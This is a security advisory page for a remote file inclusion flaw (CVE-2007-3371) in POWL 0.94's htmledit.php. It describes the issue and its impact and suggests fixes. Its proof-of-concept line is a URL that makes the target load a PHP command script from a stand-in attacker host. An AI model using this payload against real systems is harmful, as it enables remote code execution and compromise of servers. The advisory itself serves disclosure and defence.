- 28 May 2008Advisories » POWL "_POWL[installPath]" Parameter Handling Remote File Inclusion Vulnerability
| Release Date: | 22/06/2007 | Severity: | Highly Critical  |
| SecWatch Advisory: | SWID1018257 | Cause: | Input validation error |
| Solution Status: | Unpatched | Impact: | Disclosure of system information Execution of arbitrary code |
| Exploit Status: | PoC Available | Access Vector: | From remote |
| Affected Software: | POWL 0.x | ||
| References: | http://milw0rm.com/exploits/4090 FrSIRT/ADV-2007-2306 |
||
| CVE: | CVE-2007-3371 | ||
Description:
An input validation vulnerability in POWL has been reported, which can be exploited by remote users to disclose sensitive information or compromise a vulnerable system.
User-supplied input passed to the "_POWL[installPath]" parameter in plugins/widgets/htmledit/htmledit.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from external and local resources, such as arbitrary PHP code which will be executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.
Affected:
POWL 0.94. Other versions may also be affected.
Proof of Concept:
Arbitrary File Inclusion:
http://[target]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://[attacker]/cmd.php
Solution:
There was no vendor-supplied solution at the time of entry.
Edit source code manually to ensure user-supplied input is correctly sanitised.
Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities.
Credits:
Free Vulnerability Notification Service
Receive free instant and customisable notifications of new vulnerabilities or exploits via e-mail, web or RSS feeds. Click here for more information.